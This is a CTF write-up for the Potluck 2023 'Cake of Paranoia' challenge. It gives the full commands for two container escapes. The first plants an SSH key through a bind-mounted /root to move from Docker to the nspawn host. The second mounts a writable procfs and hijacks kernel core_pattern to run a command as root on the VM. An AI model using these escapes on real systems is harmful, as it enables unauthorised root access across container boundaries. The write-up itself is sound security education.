Potluck CTF 2023 -- Cake of Paranoia
2023-12-28
A layer cake of paranoia. Please enjoy, and don't be afraid to take seconds.

I blooded the chal :) with a cheese strat way easier than the intended route.

challenge01-dist.tgz

We’re provided a rootfs and TCP connection info that gets us a shell.

potluck-ctf-2023/cake-of-paranoia/rootfs
❯ fd

etc/systemd/nspawn/
etc/systemd/nspawn/ubuntu.nspawn
etc/systemd/system.control/systemd-nspawn@ubuntu.service.d/
etc/systemd/system.control/systemd-nspawn@ubuntu.service.d/50-DeviceAllow.conf
...
etc/systemd/system/multi-user.target.wants/machines.target
etc/systemd/system/machines.target.wants/
etc/systemd/system/machines.target.wants/systemd-nspawn@ubuntu.service
...
var/lib/machines/ubuntu/
usr/lib/libnss_mymachines.so.2
usr/share/man/man1/systemd-machine-id-setup.1.gz
var/lib/machines/ubuntu/opt/
var/lib/machines/ubuntu/opt/containerd/
var/lib/machines/ubuntu/opt/containerd/bin/
var/lib/machines/ubuntu/opt/containerd/lib/
var/lib/machines/ubuntu/bin
var/lib/machines/ubuntu/sys/
var/lib/machines/ubuntu/media/
var/lib/machines/ubuntu/lib
var/lib/machines/ubuntu/run/
var/lib/machines/ubuntu/boot/
...
var/lib/machines/ubuntu/var/lib/docker/
var/lib/machines/ubuntu/var/lib/docker/engine-id
var/lib/machines/ubuntu/var/lib/docker/runtimes/
var/lib/machines/ubuntu/var/lib/docker/network/
var/lib/machines/ubuntu/var/lib/docker/network/files/
var/lib/machines/ubuntu/var/lib/docker/network/files/local-kv.db
var/lib/machines/ubuntu/var/lib/docker/volumes/
var/lib/machines/ubuntu/var/lib/docker/volumes/metadata.db
var/lib/machines/ubuntu/var/lib/docker/volumes/backingFsBlockDev
var/lib/machines/ubuntu/var/lib/docker/containers/
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221-json.log
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/mounts/
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/hosts
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/hostconfig.json
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/resolv.conf.hash
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/resolv.conf
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/config.v2.json

Examining the rootfs and connecting to the shell, the general structure of the challenge becomes clear.

We connect into a shell inside a Docker container. That Docker container runs inside a systemd-nspawn container, which in turn runs inside an Arch VM, and the flag sits at /flag.txt in the top-level VM, where a cron job checks for it every minute:

// runs every minute by cron
const GLib = imports.gi.GLib;

if (!GLib.access("/flag.txt", 0)) {
    console.log("yay, the flag's still there!");
} else {
    console.log("whoops, the flag's gone");
}
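
The layering can also be confirmed interactively; a minimal sketch of the checks I'd reach for (illustrative commands, not from the original session, and assuming the relevant binaries exist in each layer):

> ls /.dockerenv                    # Docker drops this marker file at the container root
> cat /proc/1/cgroup                # docker-scoped cgroup paths betray the runtime
> systemd-detect-virt --container   # from the nspawn layer: prints "systemd-nspawn"
> systemd-detect-virt --vm          # from the outer layer: prints the VM's hypervisor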

We’ll need to do two container escapes: first from Docker to nspawn, then from nspawn to the top level. I’ll start by examining the Docker container for any security-relevant configuration.

> cat /proc/self/status | grep CapEff
CapEff: 00000000a80425fb
> capsh --decode=00000000a80425fb
0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap

The capabilities are more or less uninteresting: this is the default Docker set, and nothing in it can be leveraged to break out. Looking inside the container config, though, shows something very suspicious: /root is bind-mounted as a volume inside the container.

{
  "StreamConfig": {},
  "State": {
    "Running": true,
    "Paused": false,
    "Restarting": false,
    "OOMKilled": false,
    "RemovalInProgress": false,
    "Dead": false,
    "Pid": 466,
    "ExitCode": 0,
    "Error": "",
    "StartedAt": "2023-11-29T08:37:47.639966172Z",
    "FinishedAt": "0001-01-01T00:00:00Z",
    "Health": null
  },
  "ID": "68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221",
  "Created": "2023-11-29T08:37:46.082139124Z",
  "Managed": false,
  "Path": "socat",
  "Args": [
    "-d",
    "-d",
    "TCP-LISTEN:1337,reuseaddr,fork",
    "EXEC:/bin/sh,stderr"
  ],
  "Config": {
    "Hostname": "68be6028e3e4",
    "Domainname": "",
    "User": "",
    "AttachStdin": false,
    "AttachStdout": false,
    "AttachStderr": false,
    "ExposedPorts": {
      "1337/tcp": {}
    },
    "Tty": false,
    "OpenStdin": false,
    "StdinOnce": false,
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    ],
    "Cmd": null,
    "Image": "entrypoint",
    "Volumes": null,
    "WorkingDir": "",
    "Entrypoint": [
      "socat",
      "-d",
      "-d",
      "TCP-LISTEN:1337,reuseaddr,fork",
      "EXEC:/bin/sh,stderr"
    ],
    "OnBuild": null,
    "Labels": {}
  },
  "Image": "sha256:8adf4a1c6bc350ad16f843424110069b69e4423ef4d87daa39c38ab001659166",
  "ImageManifest": null,
  "NetworkSettings": {
    "Bridge": "",
    "SandboxID": "e1a8b0eceb93d2ed34f0e5f0c5935963554cf35071a19b7dbb692c1e25540c7e",
    "HairpinMode": false,
    "LinkLocalIPv6Address": "",
    "LinkLocalIPv6PrefixLen": 0,
    "Networks": {
      "bridge": {
        "IPAMConfig": null,
        "Links": null,
        "Aliases": null,
        "NetworkID": "8a082b6e4f0e46624e5ca1cc014fc1a5a52f44d6b4ce65cc6a015b7391de87de",
        "EndpointID": "07628d86f5bf567d848707f7f1af75d72bf89059d19349ab71f21b6d0fdf25bc",
        "Gateway": "172.17.0.1",
        "IPAddress": "172.17.0.2",
        "IPPrefixLen": 16,
        "IPv6Gateway": "",
        "GlobalIPv6Address": "",
        "GlobalIPv6PrefixLen": 0,
        "MacAddress": "02:42:ac:11:00:02",
        "DriverOpts": null,
        "IPAMOperational": false
      }
    },
    "Service": null,
    "Ports": {
      "1337/tcp": [
        {
          "HostIp": "0.0.0.0",
          "HostPort": "1337"
        },
        {
          "HostIp": "::",
          "HostPort": "1337"
        }
      ]
    },
    "SandboxKey": "/var/run/docker/netns/e1a8b0eceb93",
    "SecondaryIPAddresses": null,
    "SecondaryIPv6Addresses": null,
    "IsAnonymousEndpoint": true,
    "HasSwarmEndpoint": false
  },
  "LogPath": "/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221-json.log",
  "Name": "/jovial_mcnulty",
  "Driver": "overlay2",
  "OS": "linux",
  "RestartCount": 0,
  "HasBeenStartedBefore": true,
  "HasBeenManuallyStopped": false,
  "MountPoints": {
    "/root": {
      "Source": "/root",
      "Destination": "/root",
      "RW": true,
      "Name": "",
      "Driver": "",
      "Type": "bind",
      "Propagation": "rprivate",
      "Spec": {
        "Type": "bind",
        "Source": "/root",
        "Target": "/root"
      },
      "SkipMountpointCreation": false
    }
  },
  "SecretReferences": null,
  "ConfigReferences": null,
  "MountLabel": "",
  "ProcessLabel": "",
  "AppArmorProfile": "",
  "SeccompProfile": "",
  "NoNewPrivileges": false,
  "HostnamePath": "/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/hostname",
  "HostsPath": "/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/hosts",
  "ShmPath": "",
  "ResolvConfPath": "/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/resolv.conf",
  "LocalLogCacheMeta": {
    "HaveNotifyEnabled": false
  }
}
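
The same bind mount is visible from inside the container as well; a quick confirmation (my command, not from the original session):

> grep ' /root ' /proc/self/mountinfo   # the /root mount point shows up with its host source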

Following up on that shows that we have write access to root’s .ssh directory, that sshd is running on the host, and that the host and the Docker container are networked together. After fighting with the IO for a long time, I managed to get a dropbear binary into the container and confirmed I could SSH up a level.
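
A minimal sketch of that escalation, assuming dropbear's tools are already inside the container (the key paths and exact commands here are mine, not from the original session; 172.17.0.1 is the bridge gateway from the config above, i.e. the nspawn host):

> mkdir -p /root/.ssh                   # /root is the host's /root via the bind mount
> dropbearkey -t ed25519 -f /tmp/id     # generate a client keypair
> dropbearkey -y -f /tmp/id | grep '^ssh-ed25519' >> /root/.ssh/authorized_keys
> dbclient -i /tmp/id root@172.17.0.1   # ssh up a level as root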

> cat /proc/self/status | grep CapEff
CapEff: 00000000fdecbfff
> capsh --decode=00000000fdecbfff
0x00000000fdecbfff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_owner,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap

Looking at the nspawn config shows we are explicitly allowed to invoke the add_key, keyctl, and bpf syscalls inside the container, all of which systemd-nspawn's default seccomp denylist would otherwise block.

[Exec]
Boot=true
PrivateUsers=false
SystemCallFilter=add_key keyctl bpf

[Network]
Zone=guests
Port=1337

[Files]
Bind=/dev/fuse
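
As a sanity check (my own illustration; it assumes the keyutils tools exist in the container, which isn't stated anywhere), a keyring call that nspawn's default denylist would reject with EPERM goes through here:

> keyctl show @s   # succeeds only because keyctl/add_key are on the allow-list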

I know the author well enough to be sure the intended solution is bpf fuckery (with the bpf syscall and cap_sys_admin), but I don’t know bpf well and didn’t want to go that route. Fortunately for me, cap_sys_admin is an unreasonably powerful capability, and there are other routes.

Systemd, by default, mounts procfs and sysfs read-only inside the container. It does not, however, prevent a user with the appropriate (and default-granted) capabilities from mounting a fresh, writable instance of procfs. Once you have write access to procfs, escalating is trivial via core_pattern: a handler registered there with a leading | is executed by the kernel as root in the initial namespaces, i.e. in the top-level VM, whenever any process dumps core.

> mkdir proc
> mount -t proc proc proc
> echo '|/usr/bin/cp /flag.txt /var/lib/machines/ubuntu/flag.txt' > proc/sys/kernel/core_pattern
> ./crash
> cat /flag.txt
potluck{sometimes-we-all-get-in-a-little-over-our-heads-dont-we}
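
Two details worth spelling out: /var/lib/machines/ubuntu/ is the nspawn rootfs as seen from the VM, so the copied flag lands at /flag.txt inside the container, and ./crash is just any program that dumps core. If you don't have a crasher handy, a stand-in might be (my own, not from the original session):

> ulimit -c unlimited     # make sure core dumps aren't disabled
> sh -c 'kill -SEGV $$'   # SIGSEGV's default disposition dumps core, firing the handler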